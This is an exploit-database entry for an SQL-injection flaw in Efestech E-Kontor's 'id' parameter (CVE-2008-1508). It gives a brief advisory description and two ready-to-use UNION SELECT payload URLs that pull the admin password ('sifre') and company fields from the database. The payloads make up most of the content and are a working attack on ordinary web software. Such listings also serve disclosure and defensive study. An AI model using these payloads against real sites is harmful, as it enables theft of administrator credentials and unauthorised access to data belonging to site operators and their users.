Efestech E-Kontor - 'id' SQL Injection



EKU-ID: 36446 CVE: CVE-2008-1508;OSVDB-43659 OSVDB-ID:
Author: RMx Published: 2008-03-24 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/28412/info

Efestech E-Kontor is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/?id=-1%20union+select+0,sifre,2,3+from+admin+where+id=1
http://www.example.com/?id=-1%20union+select+0,firma,2,3+from+admin+where+id=1